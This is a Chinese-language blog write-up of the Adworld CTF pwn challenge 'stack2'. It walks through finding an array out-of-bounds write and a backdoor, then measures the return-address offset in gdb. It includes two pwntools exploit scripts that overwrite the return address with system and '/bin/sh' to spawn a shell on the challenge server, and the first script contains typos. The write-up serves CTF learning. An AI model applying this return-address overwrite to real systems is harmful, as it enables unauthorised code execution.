pwn刷题num16----寻找地址间距,栈溢出覆盖返回地址

最新推荐文章于 2022-12-22 09:34:30 发布
最新推荐文章于 2022-12-22 09:34:30 发布
阅读量771 收藏 1
点赞数
分类专栏: 攻防世界 pwn CTF 文章标签: 系统安全 网络安全 安全 c语言 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tbsqigongzi/article/details/124355526
版权
pwn 同时被 3 个专栏收录
67 篇文章 5 订阅
订阅专栏
CTF
61 篇文章 1 订阅
订阅专栏
攻防世界
17 篇文章 0 订阅
订阅专栏

攻防世界pwn进阶区stack2在这里插入图片描述

首先查保护–>看链接类型–>赋予程序可执行权限–>试运行
在这里插入图片描述

64位,小端序
开启部分RELRO---got表仍可写
开启canary保护---栈溢出需绕过canary
开启NX保护----堆栈不可执行
未开启PIE----程序地址为真实地址
动态链接

在这里插入图片描述
运行程序,先输入数字总量,之后输入数字,会有一个菜单栏,分别实现对数字展示,添加,改变,取平均值,和退出程序五种功能。
ida看一下主函数
在这里插入图片描述
在这里插入图片描述
观察主函数,发现一处溢出数组越界漏洞,v5没有限制大小,使得数组v13[]可以越界访问数据并修改其值。

在这里插入图片描述
找找其他函数,发现了后门函数
在这里插入图片描述
(这个后门函数调用/bin/bash,但是实际运行中远程靶机没有bash,需要改为/bin/sh)

思路

可以通过数组越界逐字节修改栈上返回地址为后门函数地址
现在需要找到数组首地址,要找到数组首地址,首先要找到该数组一开始输入的地方
在这里插入图片描述
在这看数组首地址应该是v13的地方吧,

如果这样的话,数组首地址距离返回地址为0x74(0x70+0x4)字节
我们通过程序里的change选项(如下)将返回地址覆盖为(system.plt:0x08048450)及其后面(+0x4)的参数(/bin/sh:0x08048987(/bin/sh的16进制机器码))
exp

from pwn import *
#context.log_level = 'debug'
context(os = 'linux',endian = 'little',log_level = 'debug',ashch = 'i386')
sh = remote('111.200.241.244',64459)
#sh = process("./stack2")
sh.sendlineafter("How many numbeshs you have:\n","1")
sh.sendlineafter("Give me yoush numbeshs\n","1")

def change(addsh, num):
    sh.sendlineafter("5. exit\n","3")
    sh.sendlineafter("which numbesh to change:\n",str(addsh))
    sh.sendlineafter("new numbesh:\n",str(num))

#32位程序,返回地址共4字节,从低字节到高字节逐字节覆盖,system.plt:0x08048450
change(0x74, 0x50)   #system.plt:0x08048450
change(0x75, 0x84)
change(0x76, 0x04)
change(0x77, 0x08)  #0x87与0x8c差4字节(为system函数调用后的返回地址)
change(0x7c, 0x87)  #/bin/sh:0x08048987
change(0x7d, 0x89)
change(0x7e, 0x04)
change(0x7f, 0x08)  

sh.sendline("5")    

sh.inteshactive()

在这里插入图片描述
结果不行,无法获得shell,有可能是数组首地址到返回地址距离找的不对

我们查看一下输入数组数值,这里的汇编代码,更深入分析
在这里插入图片描述
在这里插入图片描述
用gdb看一下,首先在0x80486D5处断点,运行,之后输入1和2,代表数字总量为1,输入数字为2
在这里插入图片描述
在这里插入图片描述

之后看到eax存储的地址为0xffffcdf8(数组首地址)
在这里插入图片描述
查看一下0xffffcdf8处内存
在这里插入图片描述
之后单步汇编运行一下(mov [eax], cl)(命令为ni)
在这里插入图片描述
再查看一下内存,cl是单字节,所以运行完汇编命令(mov [eax], cl)后0xffffcdf8地址处末尾字节从58变为02(02即为我们输入的数字2)
在这里插入图片描述

说明v13数组首地址就为0xffffcdf8
继续运行,再查找一下返回地址----esp所存地址(0xffffce7c)__libc_start_main即为返回地址
在这里插入图片描述

距离 = 返回地址 - 数组首地址 = 0xffffce7c - 0xffffcdf8 = 0x84
我们通过程序里的change选项(如下)将返回地址覆盖为(system.plt:0x08048450)及其后面(+0x4)的参数(/bin/sh:0x08048987(/bin/sh的16进制机器码))
在这里插入图片描述
在这里插入图片描述
exp

from pwn import *
context(os = 'linux',endian = 'little',log_level = 'debug',arch = 'i386')
sh = remote('111.200.241.244',64459)
#sh = process("./stack2")
sh.sendlineafter("How many numbers you have:\n","1")
sh.sendlineafter("Give me your numbers\n","1")

def change(addr, num):
    sh.sendlineafter("5. exit\n","3")
    sh.sendlineafter("which number to change:\n",str(addr))
    sh.sendlineafter("new number:\n",str(num))

#32位程序,返回地址共4字节,从低字节到高字节逐字节覆盖,system.plt:0x08048450
change(0x84, 0x50)   #system.plt:0x08048450
change(0x85, 0x84)
change(0x86, 0x04)
change(0x87, 0x08)  #0x87与0x8c差4字节(为system函数调用后的返回地址)
change(0x8c, 0x87)  #/bin/sh:0x08048987
change(0x8d, 0x89)
change(0x8e, 0x04)
change(0x8f, 0x08)  

sh.sendline("5")    

sh.interactive()

运行获得shell
在这里插入图片描述

tbsqigongzi
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Windows漏洞利用开发系列教程第二部分:栈溢出覆盖返回地址
01-11
翻过国外的一个二进制漏洞学习教程, 非常适合刚学习漏洞的新人。
栈溢出覆盖返回地址
新博客:https://aping-dev.com/
05-26 2216
#include<stdio.h> #include<stdlib.h> int stack_over_flow() { char Password[16] = { 0, }; gets(Password); return 0; } void readfile() { FILE* fp; char FileStr[20] = { 0, }; pri...
CTF-PWN练习之返回地址覆盖
ChuMeng1999的博客
01-05 749
目录预备知识一、相关实验二、函数调用约定三、基本的缓冲区溢出攻击模型实验目的实验环境实验步骤一源码审计实验步骤二使用gdb调试程序实验步骤三发起溢出攻击 预备知识 一、相关实验 本实验要求您已经认真学习和完成了《CTF-PWN练习》、《CTF-PWN练习之精确覆盖变量数据》、《CTF PWN练习之函数指针改写》等试验。 二、函数调用约定 函数调用约定描述了函数传递参数的方式和栈协同工作的技术细节,不同的函数调用约定原理基本相同,但在细节上是有差别的,包括函数参数的传递方式、参数的入栈顺序、函数返回时由谁来平
栈溢出覆盖函数返回地址
iczfy585的博客
10-18 3070
栈溢出覆盖函数返回地址原理利用 原理 栈溢出栈溢出就是栈上的缓冲区填入过多的数据,超出了边界,从而导致了栈上原有数据被覆盖。 函数调用的时候,会开辟一个栈帧结构。首先会将调用的函数的参数入栈,然后依次压入调用函数的返回地址和当前栈底指针寄存器(BP)的值入栈。其中压入返回地址是通过call指令来实现的。 在函数调用结束的时候,将栈指针SP重新指向帧指针BP的位置,并弹出BP和返回地址IP。这样函数状态将恢复成进入子函数的状态,实现了函数栈的切换。 当用call指令调用一个函数的时候,首先会将IP寄存
栈溢出之构造函数覆盖返回地址
iczfy585的博客
10-20 737
栈溢出利用已知函数覆盖返回地址 题目:攻防世界 level2 查看文件的保护,发现没有栈哨,可以考虑覆盖返回地址。 利用IDA进行静态分析,找到vulnerable_function()函数 ssize_t vulnerable_function() { char buf; // [esp+0h] [ebp-88h] system("echo Input:"); return read(0, &buf, 0x100u); } read函数读入了0x100的大小到缓冲区,但是缓冲区只
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
python struts-pwn.py --list 'urls.txt' -c 'id' 检查针对单个URL的漏洞是否存在。 python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action' 根据URL列表检查漏洞是否存在。 ...
Bugku S3 AWD排位赛-9 pwn二进制
最新发布
08-27
Bugku S3 AWD排位赛-9 pwn二进制
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
PWN入门(4)覆盖程序函数的返回地址
Ba1_Ma0的博客
09-09 913
有什么不会或者是错误的地方的可以私信我,看到必回。
pwn 练习笔记 覆盖内存地址
SsMing的博客
09-02 1367
目录   覆盖内存地址  protostar stack2 protostar format3 ssh copy文件报错 覆盖内存地址 根据ctfwiki学习 小于机器字长的数字,因为之前覆盖的方法把地址放在最前面,所以覆盖后,最小值也是4,如果是小于4的数字 可以把地址放在后面 覆盖大数字,构造通用函数如下: def fmt(prev, word, index):   ...
ch2:栈溢出,修改邻接变量,修改函数返回地址
1ame的博客
10-23 1870
实验环境: 操作系统 Windows7 IDE VC 6.0 build版本 debug 用于实验的C语言代码: #include #define PASSWORD "1234567" int verify_password(char * password) { int authenticated; //add loc
堆栈函数返回地址的修改 堆栈溢出
知止定静安虑得
01-17 728
http://blog.csdn.net/eqxu/archive/2007/07/10/1684361.aspx
【七日打卡】Pwn栈溢出利用详解
阿道夫的博客
12-22 841
🖥栈是汇编语言中的一种数据结构,遵循LIFO(Last in Fist Out)原则,即后进先出。压栈(Push)、出栈(Pop)。📌注意:栈从高地址向低地址存储。
栈溢出基础
m0_56069948的博客
05-28 214
🚀 优质资源分享 🚀 学习路线指引(点击解锁) 知识定位 人群定位 🧡 Python实战微信订餐小程序 🧡 进阶级 本课程是python flask+微信小程序的完美结合,从项目搭建到腾讯云部署上线,打造一个全栈订餐系统。 💛Python量化交易实战💛 入门级 手把手带你打造一个易扩展、更安全、效率更高的量化交易系统 栈溢出基础 之前已经介绍C语言函数调用栈,本文将正式介绍栈溢出攻击。 当函数调用结束时,将发生函数跳转,通过读取存放在栈上的信息(返回地址),跳转执行下一条指令。通过
CTF PWN练习之绕过返回地址限制
合天网安学院
03-23 518
介绍一些这个实验要知道的一些东西 builtin_return_address函数 builtin_return_address函数接收一个参数,可以是0,1,2等。__builtin_return_address(0)返回当前函数的返回地址,如果参数增大1,那么就往上走一层获取主调函数的返回地址。还有多层跳转retn指令从栈顶弹出一个数据并赋值给EIP寄存器,程序继续执行时就相当于跳转到这个地址去执行代码了。如果我们将返回地址覆盖为一条retn指令的地址,那么就又可以执行一条retn指令了,相当于再在栈
CTF-PWN练习之绕过返回地址限制
ChuMeng1999的博客
01-06 410
目录预备知识一、相关实验二、__builtin_return_address函数三、理解多层跳转实验目的实验环境实验步骤一源码审计实验步骤二使用gdb调试程序实验步骤三发起溢出攻击 预备知识 本实验要求实验者具备如下的相关知识。 一、相关实验 本实验要求您已经认真学习和完成了《CTF PWN练习之执行Shellcode》。 二、__builtin_return_address函数 __builtin_return_address函数接收一个参数,可以是0,1,2等。__builtin_return_addr
溢出覆盖返回地址实现攻击
九层台
08-26 2562
都知道call语句分2步 1.把返回地址放入堆栈 2.跳转到call的地址 如果这个返回地址覆盖成我们想要执行的函数的地址结果是不是很有趣 O(∩_∩)O 思路很见到,找到我们需要的地址然后覆盖原来的返回地址就行了 下面就讲一些实现的细节 #include   void win() {     printf("Congratulations, you pwned
攻防世界pwn-forgot
08-10
很抱歉,但是我无法回答你的问题。我只能提供关于麦田怪圈的信息。123 #### 引用[.reference_title] - *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值